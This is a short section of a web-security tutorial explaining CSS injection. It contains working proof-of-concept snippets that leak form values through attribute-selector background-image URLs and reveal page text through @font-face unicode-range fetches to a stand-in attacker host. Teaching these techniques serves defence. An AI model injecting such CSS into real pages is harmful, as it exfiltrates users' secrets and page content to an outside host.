4.2.9.2. CSS Injection

4.2.9.2.1. Basic introduction

CSS injection first started to use such as expression() url() regex() etc. functions or features to introduce external malicious code, but with the development of browsers, this method was gradually disabled, and at the same time, some new attack methods appeared.

4.2.9.2.2. CSS selectors

<style>
    #form2 input[value^='a'] { background-image: url(http://localhost/log.php/a); }
    #form2 input[value^='b'] { background-image: url(http://localhost/log.php/b); }
    #form2 input[value^='c'] { background-image: url(http://localhost/log.php/c); }
    [...]
</style>
<form action="http://example.com" id="form2">
    <input type="text" id="secret" name="secret" value="abc">
</form>

The image above is an example of an attack using CSS selectors

4.2.9.2.3. Abusing Unicode Range

When you can insert CSS, you can use font-face match unicode-range to get the corresponding character set of the target page. The PoC is as follows:

<style>
@font-face{
 font-family:poc;
 src: url(http://attacker.example.com/?A); /* fetched */
 unicode-range:U+0041;
}
@font-face{
 font-family:poc;
 src: url(http://attacker.example.com/?B); /* fetched too */
 unicode-range:U+0042;
}
@font-face{
 font-family:poc;
 src: url(http://attacker.example.com/?C); /* not fetched */
 unicode-range:U+0043;
}
#sensitive-information{
 font-family:poc;
}
</style>
<p id="sensitive-information">AB</p>

When there are more characters, you can narrow the range in combination with CSS properties such as ::first-line to get more precise content.